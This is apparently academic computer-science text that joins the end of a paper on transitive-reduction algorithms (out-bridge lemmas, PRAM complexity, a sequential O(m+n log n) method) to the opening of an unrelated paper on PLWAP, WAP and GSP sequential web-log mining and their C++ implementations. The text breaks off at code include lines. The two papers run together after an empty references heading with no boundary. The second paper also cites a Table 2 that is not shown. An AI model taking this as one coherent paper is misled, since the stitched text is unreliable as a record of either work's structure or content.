**Case 2a:** The vertex \( z \) is reachable from some non-descendant \( w \) of \( v \) in \( H_k \). Then an arc \((w,a)\) is introduced in step 2c of the algorithm. If \( w \) is in \( G_k \) then the tree path to \( w \) followed by arc \((w,a)\) followed by path \( p''' \) is an active path to \( v \) in \( G_k \). If \( w \) is in \( G_{k-1}-G_k \) then the analysis of Case 1 gives an active path to \( v \) in \( G_k \).
**Case 2b:** The vertex \( z \) is not reachable from any non-descendant of \( v \) in \( H_k \). Now consider \( p'' \). This is a path of the form \( \langle u_{1,1}, \ldots, u_{1,k_1}, v_{1,1}, \ldots, v_{1,l_1}, \ldots, u_{c,1}, \ldots, u_{c,k_c}, v_{c,1}, \ldots, v_{c,l_c} \rangle \), where the \( u_{i,j} \) are in \( G_{k-1}-G_k \) and the \( v_{i,j} \) are in \( G_k \), and if \( y \) is in \( G_k \) the initial sequence of \( u_{1,j} \)'s is empty. All of the \( u_{i,j} \) and \( v_{i,j} \) are descendants of \( v \). Each \( v_{i,1} \) is reachable from \( v_{i-1,l_{i-1}} \) in \( H_k \). Hence by step 2c of algorithm Outbridges, there is an arc from \( v_{i-1,l_{i-1}} \) to \( v_{i,1} \) in \( G_k \). The vertex \( v_{1,1} \) has an incoming arc from \( x \) in \( G_k \). The remaining arcs in \( p'' \) remain in \( G_k \). Hence there is a path from \( x \) to \( v \) in \( G_k \) that contains only vertices that are descendants of \( v \) in \( G_k \). Hence \( v \) is an active vertex in \( G_k \).[]
**Lemma 9:** Let \( e=(u,v) \) be a tree arc in \( G_{k,k>1} \) that is not an out-bridge in \( G_k \). Then \( e \) is not an out-bridge in \( G_{k-1} \).
**Proof:** Since \( e \) is not an out-bridge in \( G_k \) there is an active path \( p \) to \( v \) in \( G_k \). Consider any arc \( f=(x,y) \) in \( p \) that is not present in \( G_{k-1} \). If \( f \) was introduced in step 2c of algorithm Outbridges then there is a path from \( x \) to \( y \) in \( G_{k-1} \) that avoids all tree arcs in \( G_k \) and hence arc \( e \). If \( f \) was introduced in step 2d then there is a path from a descendant of \( x \) to \( y \) in \( G_{k-1} \) that avoids all tree arcs in \( G_k \). Hence there is a path from \( x \) to \( y \) in \( G_{k-1} \) that avoids arc \( e \). Hence from \( p \) we can obtain an active path \( p' \) to \( v \) in \( G_{k-1} \). Thus \( e \) is not an out-bridge in \( G_{k-1} \).
**Lemma 10:** Algorithm Outbridges correctly finds the out-bridges of $G$.
**Proof:** We show that at the start of each iteration of the repeat loop,
1) The out-bridges identified so far are exactly the out-bridges in the portion of the input graph $G$ that has been collapsed by the algorithm.
2) An arc $e$ in the current graph $G$ is an out-bridge in this graph if and only if it is an out-bridge in the original input graph.
The proof is by induction on $k$, the number of iterations of the repeat loop.
**Base:** $k=1$. The claim is vacuously true since no out-bridges have been identified and the input graph is the same as the current graph.
**Induction step:** Assume that the two claims are true until the start of iteration $k-1$ and now consider the start of iteration $k$. Claim 1) follows by the induction hypothesis and Lemma 7. Claim 2) follows by the induction hypothesis and Lemmas 8 and 9.[]
Finally we note that algorithm Outbridges runs in $O(\log^2 n)$ time with $O(n^3)$ processors on a CRCW PRAM. To see the processor and time bounds let us analyze the time complexity of each iteration of the repeat loop. By the previous analysis for the time complexity of algorithm Shrink, step 1 runs in $O(\log n)$ time with $O(n^2)$ processors on a CREW PRAM. Steps 2a, 2c, and 2d run in $O(\log n)$ time with $O(n^2)$ processors on a CREW PRAM. Step 2b runs in $O(\log n)$ time with $O(n^3)$ processors on a CRCW PRAM, and is the most expensive step in the repeat loop. Since the repeat loop is executed $O(\log n)$ times we obtain the stated time and processor bounds for algorithm Outbridges. On a CREW PRAM this algorithm runs in $O(\log^3 n)$ time with $M(n)$ processors.
Whether we use a CREW model or a CRCW model the time and processor bounds for finding a minimum weight branching using the algorithm in [Lo] dominate the time and processor bounds of algorithm Outbridges. Hence we can find redundant arcs within the time and processor bounds for minimum weight branchings, and thus the parallel transitive reduction algorithm runs in $O(\log^3 n)$ parallel time with $O(n^3)$ processors on a CRCW PRAM and in $O(\log^4 n)$ parallel time with the same processor bound on a CREW PRAM.
4. Sequential Algorithms for Transitive Reduction
As in section 3.2, let $r$ be a fixed root of a directed graph $G=(V,E)$, where $|V|=n$ and $|E|=m$. An algorithm for finding the in- and out-bridges is given in [Ta2]. This algorithm actually does more: It computes two forward branchings $T_1$ and $T_2$ having only the out-bridges in common, and two inverse branchings, $T_3$ and $T_4$, having only the in-bridges in common. This
algorithm can be implemented to run in linear time by using linear-time algorithms for computing nearest common ancestors [HT] and maintaining disjoint sets [GT].
Let $R$ be the set of redundant arcs, $I$ the set of in-bridges and $O$ the set of out-bridges. Hence $R=E-(I\cup O)$. The following algorithm finds a transitive reduction of $G$.
1. Pick a root vertex $r$ in $G$. Find a forward branching $B$ and an inverse branching $B'$ in $G$ and replace $G$ by $B\cup B'$.
2. Repeat
a) Construct two forward branchings $T_1$ and $T_2$ having only the out-bridges in common; identify the set of out-bridges as $O$.
b) Construct two inverse branchings $T_3$ and $T_4$ having only the in-bridges in common; identify the set of in-bridges as $I$.
c) Form the set of redundant arcs $R$ as $R=E-(O\cup I)$.
d) For $i=1,2,3,4$ form $S_i=T_i\cap R$.
e) Choose $T_i$ and $T_j$ such that $1\leq i \leq 2$, $3\leq j \leq 4$ and $S_i\cup S_j$ has minimum cardinality among $S_1\cup S_3, S_2\cup S_3, S_1\cup S_4, S_2\cup S_4$.
f) Replace $G$ by $T_i\cup T_j$.
until $R=\emptyset$.
The following claim establishes that the repeat loop is executed only $O(\log n)$ times.
**Lemma 11:** In step 2e of the algorithm the chosen $S_i$ and $S_j$ satisfy $|S_i\cup S_j|\leq (3/4)\cdot |R|$.
**Proof:** For $i=1,2,3,4$, let $F_i$ be the set of those arcs in $T_i$ that are not present in any other $T_j$, and let $P_{1,3}=(S_1\cap S_3)\cup F_1$, $P_{2,4}=(S_2\cap S_4)\cup F_2$, $P_{2,3}=(S_2\cap S_3)\cup F_3$ and $P_{1,4}=(S_1\cap S_4)\cup F_4$. Note that $P_{1,3}, P_{2,4}, P_{2,3}$ and $P_{1,4}$ are disjoint subsets of $R$. Let one, say $P_{1,3}$, be the one of maximum cardinality. Then we must have $|P_{2,4}|+|P_{2,3}|+|P_{1,4}|\leq (3/4)\cdot |R|$. But $S_2\cup S_4\subseteq P_{2,4}\cup P_{2,3}\cup P_{1,4}$, which implies $|S_2\cup S_4|\leq (3/4)\cdot |R|$. Since we also have $S_1\cup S_3\subseteq P_{1,3}\cup P_{1,4}\cup P_{2,3}$, $S_1\cup S_4\subseteq P_{1,3}\cup P_{1,4}\cup P_{2,4}$ and $S_2\cup S_3\subseteq P_{2,3}\cup P_{2,4}\cup P_{1,3}$, we have $|S_1\cup S_3|\leq (3/4)\cdot |R|$ if $P_{2,4}$ is of maximum cardinality, $|S_1\cup S_4|\leq (3/4)\cdot |R|$ if $P_{2,3}$ is of maximum cardinality and $|S_2\cup S_3|\leq (3/4)\cdot |R|$ if $P_{1,4}$ is of maximum cardinality. Hence the chosen $S_i$ and $S_j$ in step 2e of the algorithm satisfy $|S_i\cup S_j|\leq (3/4)\cdot |R|$.[]
Step 1 of the algorithm takes $O(n+m)$ time and renders $G$ sparse ($O(n)$ arcs). As mentioned above, steps 2a and 2b can be implemented to run in $O(n)$ time using the algorithm in [Ta2], in conjunction with the algorithms in [HT] and [GT]. Each of steps 2c through 2f takes $O(n)$ time. Hence each execution of the repeat loop takes linear time. Since by Lemma 11 the repeat loop is
executed $O(\log n)$ times, the entire transitive reduction algorithm runs in $O(m+n\log n)$ time.
The algorithm of section 2 can also be implemented to run in $O(m+n\log n)$ time. This is because the minimum-weight branching algorithm of Edmonds [Ed2] can be implemented to run in linear time for 0-1 edge weights by using the algorithm in [GGST], with the heaps replaced by two buckets. As before, the redundant arcs can be found in linear time and hence each execution of the repeat loop takes linear time, leading to an $O(m+n\log n)$ time sequential algorithm for transitive reduction.
We have obtained sequential and parallel algorithms with similar complexities for analogous problems on undirected graphs, i.e., for finding a minimal bridge-connected spanning subgraph and a minimal biconnected spanning subgraph in an undirected graph, if such subgraphs exist. These results will appear in a companion paper.
We conclude by noting that it is conceivable that one (or both) of our sequential algorithms runs in linear time, since it is possible that the repeat loop needs to be executed only a constant number of times. We leave this question for further investigation. For the same reason it is possible that our parallel algorithms run faster than the stated time bounds by an $O(\log n)$ factor.
References
ABSTRACT
The PLWAP algorithm uses a pre-order linked, position coded version of the WAP tree and eliminates the need to recursively re-construct intermediate WAP trees during sequential mining, as is done by the WAP tree technique. PLWAP achieves a significant reduction in response time over the WAP algorithm and provides a position code mechanism for remembering the stored database, eliminating the need to re-scan the original database as would be necessary for applications like those incrementally maintaining mined frequent patterns, or performing stream or dynamic mining.
This paper presents open source code for both the PLWAP and WAP algorithms describing our implementations and experimental performance analysis of these two algorithms on synthetic data generated with IBM quest data generator. An implementation of the Apriori-like GSP sequential mining algorithm is also discussed and submitted.
Keywords
sequential patterns, web usage mining, WAP tree, pre-order linkage
1. INTRODUCTION
Basic association rule mining with the Apriori algorithm [1] finds database items (attributes) that occur most often together in database transactions. Thus, given a set of transactions (similar to database records), where each transaction is a set of items (attributes), an association rule is of the form $X \rightarrow Y$, where $X$ and $Y$ are sets of items and $X \cap Y = \emptyset$. Association rule mining algorithms generally first find all frequent patterns (itemsets) as all combinations of items or attributes with support (percentage occurrence in the entire database), greater or equal to a predefined minimum support. Then, in the second stage of mining, association rules are generated from each frequent pattern by defining all possible combinations of rule antecedent (head) and consequent (tail) from items composing the frequent patterns such that $antecedent \cap consequent = \emptyset$ and $antecedent \cup consequent = frequentpattern$. Then, only rules with confidence (number of transactions that contain the rule divided by the number of transactions containing the antecedent) greater than or equal to a pre-defined minimum confidence are retained as valuable, while the rest are pruned.
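The support count at the heart of these definitions can be illustrated with a short C++ sketch; the names here are ours for illustration and are not taken from any of the cited implementations:

```cpp
#include <algorithm>
#include <cassert>
#include <set>
#include <vector>

using Itemset = std::set<char>;

// Count how many transactions contain every item of x. Dividing this
// count by the database size gives the support percentage defined above.
int supportCount(const Itemset& x, const std::vector<Itemset>& db) {
    int n = 0;
    for (const Itemset& t : db)
        // std::includes tests the subset relation on the sorted sets.
        if (std::includes(t.begin(), t.end(), x.begin(), x.end())) ++n;
    return n;
}
```

The confidence of a rule X → Y is then `supportCount(X ∪ Y, db)` divided by `supportCount(X, db)`, matching the definition above.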
Sequential mining is an extension of basic association rule mining that accommodates ordered set of items or attributes, where the same item may be repeated in a sequence. While basic frequent pattern has a set of non-ordered items that have occurred together up to minimum support threshold, frequent sequential pattern has a sequence of ordered items that have occurred frequently in database transactions at least as often as the minimum support threshold. Thus, the measures of support and confidence used in association rule mining for deciding frequent itemsets are used in sequential mining for deciding frequent sequences. Just as an $i$-itemset contains $i$ items, an $n$-sequence contains $n$ ordered items (events). One application of sequential mining is web usage mining for finding the relationship among different web users’ accesses from web access logs [5], [11], [4] and [19]. Analysis of these access data can help for server performance enhancement and direct marketing in e-commerce as well as web personalization. Before applying sequential mining techniques to web log data, the web log transactions are pre-processed to group them into set of access sequences for each user identifier and to create web access sequences in the form of a transaction database. An example sequence database to be mined for frequent patterns used in [7], is given as Table 1.
Table 1: An example database of web access sequences

<table>
<thead>
<tr>
<th>TID</th>
<th>Web access Sequences</th>
</tr>
</thead>
<tbody>
<tr>
<td>100</td>
<td>abdac</td>
</tr>
<tr>
<td>200</td>
<td>eaebcac</td>
</tr>
<tr>
<td>300</td>
<td>babfaec</td>
</tr>
<tr>
<td>400</td>
<td>afbacfc</td>
</tr>
</tbody>
</table>
Access sequence $S' = e'_1 e'_2 \ldots e'_l$ is called a subsequence of an access sequence $S = e_1 e_2 \ldots e_n$, and $S$ a super-sequence of $S'$, denoted as $S' \subseteq S$, if and only if for every event $e'_j$ in $S'$, there is an equal event $e_k$ in $S$, while the order that
events occurred in $S$ is the same as the order of events in $S'$. For example, with $S' = ab$ and $S = babcd$, we can say that $S'$ is a subsequence of $S$. We can also say that $ac$ is a subsequence of $S$, although there is a $b$ occurring between $a$ and $c$ in $S$. In the sequence $babcd$, $bcd$ is a suffix subsequence and $bab$ is a prefix subsequence. Techniques for mining sequential patterns from web logs fall into Apriori-based and non-Apriori categories. The Apriori-like algorithms generate substantially huge sets of candidate patterns, especially for long sequential patterns [2], [3], [13], [14], [15]. WAP-tree mining [17] is a non-Apriori method which stores the web access patterns in a compact prefix tree, called the WAP-tree, and avoids generating long lists of candidate sets whose support must be scanned for. However, the WAP-tree algorithm has the drawback of recursively re-constructing numerous intermediate WAP-trees during mining in order to compute the frequent prefix subsequences of every suffix subsequence in a frequent sequence. This process is very time-consuming. The PLWAP algorithm [7] assigns a unique position code to each node of the WAP-tree and builds the WAP-tree head links in a pre-order fashion, rather than in the order the nodes arrive as done by the WAP-tree algorithm. With the pre-order linked, position coded WAP-tree, the PLWAP algorithm is able to mine frequent sequences, starting with the prefix sequence, without the need to recursively re-construct any intermediate WAP-trees. This approach results in tangible performance gains.
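The subsequence relation defined above reduces to a greedy two-pointer scan; a minimal C++ sketch (our illustration, not code from the discussed implementations):

```cpp
#include <cassert>
#include <string>

// Check whether sPrime is a subsequence of s: every event of sPrime
// must be matched in s in the same relative order, gaps allowed.
bool isSubsequence(const std::string& sPrime, const std::string& s) {
    std::size_t i = 0;                                 // next unmatched event of sPrime
    for (char e : s)
        if (i < sPrime.size() && sPrime[i] == e) ++i;  // greedy matching suffices
    return i == sPrime.size();
}
```

With $S = babcd$, the calls `isSubsequence("ab", "babcd")` and `isSubsequence("ac", "babcd")` both hold, while `isSubsequence("ca", "babcd")` does not, matching the examples above.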
This paper presents discussions of the implementations of three key sequential mining algorithms used in experimental and performance justification of the PLWAP algorithm in [7]. The C++ implementations of three sequential mining algorithms, PLWAP [7], WAP [17], and GSP [3] are discussed.
1.1 Related Work
Work on mining sequential patterns in web logs includes the GSP [3], the PSP [13], the G-sequence [18] and the graph traversal [15] algorithms. Agrawal and Srikant proposed three algorithms (Apriori, AprioriAll, AprioriSome) for sequential mining in [2]. The GSP (Generalized Sequential Patterns) algorithm [3], which is 20 times faster than the Apriori algorithm, was then proposed. The GSP algorithm makes multiple passes over the data. The first pass determines the frequent 1-item patterns ($L_1$). Each subsequent pass starts with a seed set: the frequent sequences found in the previous pass ($L_{k-1}$). The seed set is used to generate new candidate sequences ($C_k$) by performing an Apriori-gen join of $L_{k-1}$ with $L_{k-1}$. This join requires that a sequence $s$ in the first $L_{k-1}$ joins with a sequence $s'$ in the second $L_{k-1}$ if the last $k-2$ elements of $s$ are the same as the first $k-2$ elements of $s'$. For example, if the frequent 3-sequence set $L_3$ has the following 6 sequences: \{\{(1,2)(3)\}, \{(1,2)(4)\}, \{(1)(3,4)\}, \{(1,3)(5)\}, \{(2)(3,4)\}, \{(2)(3)(5)\}\}, then to obtain frequent 4-sequences, every frequent 3-sequence should join with the other 3-sequences that have the same first two elements as its last two elements. Sequence $s=((1,2)(3))$ joins with $s'=((2)(3,4))$ to generate the candidate 4-sequence $((1,2)(3,4))$ since the last 2 elements of $s$, $(2)(3)$, match the first 2 elements of $s'$. Similarly, $((1,2)(3))$ joins with $((2)(3)(5))$ to form $((1,2)(3)(5))$. There are no more matching sequences to join in $L_3$. The join phase is followed by the pruning phase, in which candidate sequences with any of their contiguous $(k-1)$-subsequences having a support count less than the minimum support are dropped.
The database is scanned for the supports of the remaining candidate k-sequences to find the frequent k-sequences ($L_k$), which become the seed for generating candidate $(k+1)$-sequences in the next pass. The algorithm terminates when there are no frequent sequences at the end of a pass, or when no candidate sequences are generated. The GSP algorithm uses a hash tree to reduce the number of candidates that are checked for support in the database.
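For the single-event web access sequences considered in this paper, the GSP join step simplifies considerably: a k-sequence $s$ joins $s'$ when dropping the first event of $s$ yields the same $(k-1)$-sequence as dropping the last event of $s'$. The following C++ sketch is our own simplification (one character per event; the pruning phase is not shown), not the submitted GSP code:

```cpp
#include <cassert>
#include <set>
#include <string>

// Simplified GSP-style candidate generation for sequences of single
// events: s joins s' when s without its first event equals s' without
// its last event; the candidate appends the last event of s' to s.
// Sequences are assumed non-empty.
std::set<std::string> gspJoin(const std::set<std::string>& freqK) {
    std::set<std::string> candidates;
    for (const std::string& s : freqK)
        for (const std::string& t : freqK)
            if (s.substr(1) == t.substr(0, t.size() - 1))
                candidates.insert(s + t.back());
    return candidates;
}
```

For instance, joining the event-level 2-sequences {ab, ba, ac, bc} yields the candidate 3-sequences {aba, abc, bab, bac}; GSP's pruning phase would then drop any candidate with an infrequent contiguous 2-subsequence.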
The PSP (Prefix Tree For Sequential Patterns) [13] approach is very similar to the GSP algorithm [3], but stores the database on a more concise prefix tree with the leaf nodes carrying the supports of the sequences. At each step \( k \), the database is browsed to count the support of the current candidates. Then, the frequent sequence set, \( L_k \), is built.
The Graph Traversal mining approach [14], [15] uses a simple un-weighted graph to store web sequences and a graph traversal algorithm similar to the Apriori algorithm to traverse the graph in order to compute the k-candidate set from the \((k-1)\)-candidate sequences without performing the Apriori-join. From the graph, if a candidate node is large, the adjacency list of the node is retrieved. The database still has to be scanned several times to compute the support of each candidate sequence, although the number of computed candidate sequences is drastically reduced from that of the GSP algorithm. Other tree-based approaches include G-sequence mining [18], which uses wildcards, templates and the construction of an Aggregate tree for mining.
The FP-tree structure [9] first reorders and stores the frequent non-sequential database transaction items on a prefix tree, in descending order of their supports, such that database transactions share common frequent prefix paths on the tree. Then, mining the tree is accomplished by recursive construction of conditional pattern bases for each frequent 1-item (in an ordered list called the f-list), starting with the lowest in the tree. A conditional FP-tree is constructed for each frequent conditional pattern having more than one path, while maximal mined frequent patterns consist of a concatenation of items on each single path with their suffix f-list item. FreeSpan [8], like the FP-tree method, lists the f-list in descending order of support, but it is developed for sequential pattern mining. PrefixSpan [16] is a pattern-growth method like FreeSpan, which reduces the search space for extending an already discovered prefix pattern \( p \) by projecting a portion of the original database that contains all necessary data for mining sequential patterns grown from \( p \).
The Web access pattern tree (WAP) algorithm is a non-Apriori algorithm proposed by Pei et al. [17]. The WAP-tree stores the web log data in a prefix tree format similar to the frequent pattern tree [9] (FP-tree). The WAP algorithm first scans the web log to compute all frequent individual events, then it constructs a WAP-tree over the set of frequent individual events of each transaction before it recursively mines the constructed WAP tree by building a conditional WAP tree for each conditional suffix frequent pattern found. The process of recursive mining of a conditional suffix WAP tree ends when it has only one branch or is empty.
An example application of the WAP-tree algorithm for finding all frequent events in the web log (constructing the WAP-tree and mining the access patterns from the WAP tree) is shown with the database in Table 2. Suppose the minimum support threshold is set at 75%, which means an access sequence $s$ should have a count of 3 out of the 4 records in
our example, to be considered frequent. Constructing the WAP-tree entails first scanning the database once to obtain the events that are frequent: $a$, $b$, $c$. When constructing the WAP-tree, the non-frequent part (like $d$, $e$, $f$) of every sequence is discarded. Only the frequent subsequences shown in column three of Table 2 are used as input. With the frequent sequence in each transaction, the WAP-tree algorithm first stores the frequent items as header nodes for linking all nodes of their type in the WAP-tree in the order the nodes are inserted. When constructing the WAP-tree, a virtual root (Root) is first inserted. Then, each frequent sequence in a transaction is used to construct a branch from the Root to a leaf node of the tree. Each event in a sequence is inserted as a node with count 1 from the Root if that node type does not yet exist, but the count of the node is increased by 1 if the node type already exists. Also, the head link for the inserted event is connected (in broken lines) to the newly inserted node from the last node of its type that was inserted, or from the header node of its type if it is the very first node of that event type inserted. Once the frequent sequential data are stored on the complete WAP-tree (Figure 1), the tree is mined for frequent patterns starting with the lowest frequent event in the header list, in our example starting from frequent event $c$, as the following discussion shows. From the WAP-tree of Figure 1, the algorithm first computes the prefix sequences of the base $c$, the conditional sequence base of $c$ (negative counts correct for $c$ nodes that lie on the prefix path of deeper $c$ nodes), as: $\{aba:2,\; abac:1,\; aba:-1,\; ab:1,\; abca:1,\; ab:-1,\; baba:1\}$
Using these conditional sequences, a conditional WAP tree, WAP-tree$|_c$, is built using the same method as shown in Figure 1. The re-construction of WAP trees progresses along the suffix sequences $c$, $bc$, discovering the frequent patterns $c$, $bc$ and $abc$ along this line. The recursion continues with the suffix path $c$, $ac$. The algorithm keeps running, finding the conditional sequence bases of $bac$, $b$, $a$. Figure 2 shows the WAP trees for mining conditional pattern base $c$. After mining the whole tree, the discovered frequent pattern set is: \( \{c, aac, bac, abac, ac, abc, bc, b, ab, a, aa, ba, aba\} \).
Although the WAP-tree algorithm scans the original database only twice and avoids the problem of generating explosive candidate sets as in Apriori-like algorithms, its main drawback is recursively re-constructing large numbers of intermediate WAP-trees and patterns during mining, taking up computing resources.
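The prefix-sharing storage underlying WAP-tree construction can be sketched as a plain trie with counts. This C++ sketch is our illustration only (header links and mining are omitted), assuming the example database reduces to the frequent subsequences abac, abcac, babac and abacc:

```cpp
#include <cassert>
#include <map>
#include <string>

// One tree node: an occurrence count plus children keyed by event.
struct Node {
    int count = 0;
    std::map<char, Node> children;
};

// Insert one frequent subsequence from the root, incrementing counts
// so that shared prefixes accumulate their support.
void insertSequence(Node& root, const std::string& seq) {
    Node* cur = &root;
    for (char e : seq) {
        cur = &cur->children[e];  // creates the node on first insertion
        ++cur->count;
    }
}

// Build the tree for the example database of frequent subsequences.
Node buildExampleTree() {
    Node root;
    for (const char* s : {"abac", "abcac", "babac", "abacc"})
        insertSequence(root, s);
    return root;
}
```

In the resulting tree the root's $a$ child has count 3 and its $b$ child count 1, matching the node counts a:3 and b:1 described for the figures.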
The Pre-Order Linked WAP tree algorithm (PLWAP) [7], [10], is a version of the WAP tree algorithm that assigns a unique binary position code to each tree node and performs the header node linkages in pre-order fashion (root, left, right). Both the pre-order linkage and the binary position codes enable PLWAP to mine the sequential patterns directly from the initial WAP tree, starting with the prefix sequence, without re-constructing the intermediate WAP trees. To assign position codes to a PLWAP node, the root has the null code, the leftmost child of any parent node has a code that appends '1' to the position code of its parent, and the position code of any other node has '0' appended to the position code of its nearest left sibling. The PLWAP technique presents much better performance than that achieved by the WAP-tree technique, as shown in extensive performance experiments.
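The position-code rules just described can be written down directly. The ancestor test below is a consequence of those rules, which is what lets PLWAP recognize descendant and sibling relationships without walking the tree; this is our sketch, with codes kept as bit strings:

```cpp
#include <cassert>
#include <string>

// Rule 1: the leftmost child appends '1' to its parent's code
// (the root has the empty code).
std::string leftmostChildCode(const std::string& parent) {
    return parent + '1';
}

// Rule 2: any other child appends '0' to the code of its nearest
// left sibling.
std::string nextSiblingCode(const std::string& leftSibling) {
    return leftSibling + '0';
}

// Consequence of the rules above: node a is an ancestor of node b
// exactly when a's code followed by '1' is a prefix of b's code.
bool isAncestor(const std::string& a, const std::string& b) {
    const std::string p = a + '1';
    return b.size() >= p.size() && b.compare(0, p.size(), p) == 0;
}
```

For example, the codes 1, 11 and 101 of the nodes a:3:1, b:3:11 and a:1:101 mentioned below follow from these rules: a:3:1 is an ancestor of b:3:11, the root (empty code) is an ancestor of every node, and siblings such as the nodes coded 1 and 10 are never ancestors of each other.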
1.2 Motivations and Contributions
The PLWAP algorithm [7], a recently proposed sequential mining tool published in the Journal of Data Mining and Knowledge Discovery, has many attractive features that make it suitable as a building block for many other sophisticated sequential data mining approaches, like incremental mining [6], web classification and personalization. Features of the PLWAP algorithm can also be applied to non-sequential mining structures like the FP-tree. PLWAP and two other key sequential mining algorithms (WAP and GSP) have been implemented and tested thoroughly on publicly available data sets (http://www.almaden.ibm.com/software/quest/Resources/index.shtml) and on real data. Meaningful use and application of these efficient tools will greatly increase if their implementations are made publicly available.
This paper contributes by discussing our C++ implementations of three key sequential mining algorithms PLWAP, WAP and the GSP used in performance studies of work in [7].
1.3 Outline of the Paper
Section 2 discusses example mining with the Pre-Order Linked WAP-Tree (PLWAP) algorithm. Section 3 discusses the C++ implementations of the PLWAP, WAP and the GSP algorithms for sequential mining. Section 4 discusses experimental performance analysis, while section 5 presents conclusions and future work.
2. AN EXAMPLE SEQUENTIAL MINING WITH PLWAP ALGORITHM
Unlike the conditional search in WAP-tree mining, which is based on finding common suffix sequences first, the PLWAP technique finds the common prefix sequences first. The main idea is to find a frequent pattern by progressively finding its common frequent subsequences, starting with the first frequent event in the pattern. For example, if abcd is a frequent pattern to be discovered, the WAP algorithm progressively finds the suffix sequences d, cd, bcd and abcd. The PLWAP tree, on the other hand, finds the prefix event a first; then, using the suffix trees of node a, it finds the next prefix subsequence ab, and continuing with the suffix trees of b, it finds the next prefix subsequence abc and finally abcd. Thus, the idea of PLWAP is to use the suffix trees of the last frequent event in an m-prefix sequence to recursively extend the subsequence to an (m+1)-sequence by appending a frequent event that occurred in the suffix trees. Using the position codes of the nodes, PLWAP is able to identify the descendant and sibling nodes of the oldest parent nodes on the suffix root sets of a frequent header element being checked for appending to a prefix subsequence, if it is frequent in the suffix root set under consideration. An element is frequent if the sum of the supports of the oldest parent nodes on all its suffix root sets is greater than or equal to the minimum support.
Assume we want to mine the web access sequence database (WASD) of Table 2 for frequent sequences, given a minimum support of 75%, or 3 transactions. Constructing and mining the PLWAP tree goes through the following steps. (1) Scan the WASD (column 2 of Table 2) once to find all frequent individual events, L, as {a:4, b:4, c:4}; the events d:1, e:2, f:2 have supports less than the minimum support of 3 and are discarded. (2) Scan the WASD again and construct a PLWAP-tree over the set of individual frequent events (column 3 of Table 2) by inserting each sequence from root to leaf, labeling each node as (node event : count : position code). Then, after all events are inserted, traverse the tree in pre-order fashion to connect the header link nodes. Figure 3 shows the completely constructed PLWAP tree with the pre-order linkages.
(3) Recursively mine the PLWAP-tree using common prefix pattern search: The algorithm starts to find the frequent sequence with the frequent 1-sequence in the set of frequent events(FE) {a, b, c}. For every frequent event in FE and the suffix trees of current conditional PLWAP-tree being mined, it follows the linkage of this event to find the first occurrence of this frequent event in every current suffix tree being mined, and adds the support count of all first occurrences of this frequent event in all its current suffix trees. If the count is greater than the minimum support threshold, then this event is appended (concatenated) to the last subsequence in the list of frequent sequences, F. The suffix trees of these first occurrence events in the previously mined conditional suffix PLWAP-trees are now in turn, used for mining the next event. To obtain this conditional PLWAP-tree, we only need to remember the roots of the current suffix trees, which are stored for next round mining. For example, the algorithm starts by mining the tree in Figure 4(a) for the first element in the header linkage list, a following the a link to find the first occurrences of a nodes in a:3:1 and a:1:101 of the suffix trees of the Root since this is the first time the whole tree is passed for mining a frequent 1-sequence. Now, the list of mined frequent patterns F is {a} since the count of event a in this current suffix trees is 4 (sum of a:3:1 and a:1:101 counts), and more than the minimum support of 3. The mining of frequent 2-sequences that start with event a would continue with the next suffix trees of a rooted at {b:3:11, b:1:1011} shown in Figure 4(b) as unshadowed nodes. The objective here is to find if 2-sequences aa, ab and ac are frequent using these suffix trees. 
In order to confirm aa frequent, we need to confirm event a frequent in the current suffix tree set; similarly, to confirm ab frequent, we again follow the b link to confirm event b frequent using this suffix tree set, and the same for ac. The process continues to obtain the same frequent sequence set {a, aa, aac, ab, aba, abac, abc, ac, b, ba, bac, bc, c} as the WAP-tree algorithm.
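As a cross-check of the example, a brute-force prefix-growth miner recovers the same frequent pattern set from the frequent subsequences abac, abcac, babac and abacc at minimum support 3. This is our illustration of the prefix-first search order only, counting support by plain subsequence containment, not the tree-based PLWAP implementation:

```cpp
#include <cassert>
#include <set>
#include <string>
#include <vector>

// Subsequence containment: two-pointer greedy scan.
static bool isSubseq(const std::string& p, const std::string& s) {
    std::size_t i = 0;
    for (char e : s)
        if (i < p.size() && p[i] == e) ++i;
    return i == p.size();
}

// Number of database sequences containing pattern p.
static int support(const std::string& p, const std::vector<std::string>& db) {
    int n = 0;
    for (const std::string& s : db)
        if (isSubseq(p, s)) ++n;
    return n;
}

// Grow each frequent pattern one event at a time, prefix-first.
static void grow(const std::string& prefix, const std::string& events,
                 const std::vector<std::string>& db, int minSup,
                 std::set<std::string>& out) {
    for (char e : events) {
        const std::string p = prefix + e;
        if (support(p, db) >= minSup) {   // frequent: record it and extend further
            out.insert(p);
            grow(p, events, db, minSup, out);
        }
    }
}

std::set<std::string> mineFrequent(const std::vector<std::string>& db,
                                   const std::string& events, int minSup) {
    std::set<std::string> out;
    grow("", events, db, minSup, out);
    return out;
}
```

On the example database this yields the 13 patterns listed for the WAP-tree and PLWAP mining above.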
3. C++ IMPLEMENTATIONS OF THE THREE SEQUENTIAL MINING ALGORITHMS
Although we lay more emphasis on the PLWAP algorithm, developed in our lab, we also provide the source codes of the WAP and GSP algorithms used for the performance analysis. The source codes are discussed under seven headings: (1) development and running environment, (2) input data format and files, (3) minimum support format, (4) output data format and files, (5) functions used in the program, (6) data structures used in the program and (7) additional information. All of the code is documented with the information in this section, and more, for code readability, maintainability and extensibility. Each program is stored in a .cpp file and compiled with "g++ filename.cpp".
3.1 C++ Implementation of the PLWAP Sequential Mining Algorithm
This is the program of the PLWAP algorithm, based on the description in [7], C.I. Ezeife and Y. Lu, "Mining Web Log Sequential Patterns with Position Coded Pre-Order Linked WAP-tree", DMKD 2005.
1. DEVELOPMENT ENVIRONMENT: Although the initial version was developed under the hardware/software environment specified below, the program also runs on more powerful and faster multiprocessor UNIX environments. The initial environment is: (i) Hardware: Intel Celeron 400 PC, 64M memory; (ii) Operating system: Windows 98; (iii) Development tool: Inprise (Borland) C++ Builder 6.0. The algorithm was developed under C++ Builder 6.0, but compiles and runs under any standard C++ development tool.
2. INPUT FILES AND FORMAT: Input file is test.data. For simplifying input process of the program, we assume that all input data have been preprocessed such that all events belonging to the same user id have been gathered together, and formed as a sequence and saved in a text file, called, “test.data”. The “test.data” file may be composed of hundreds of thousands of lines of sequences where each line represents a web access sequence for each user. Every line of the input data file (“test.data”) includes UserID, length of sequence and the sequence which are separated by tab spaces. An example input line is: 100 5 10 20 40 10 30. Here, 100 represents UserID, the length of sequence is 5, the sequence is 10,20,40,10,30.
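A line of this input format can be parsed as follows; this is a hedged sketch, and the function name is ours, not taken from the submitted code:

```cpp
#include <cassert>
#include <sstream>
#include <string>
#include <utility>
#include <vector>

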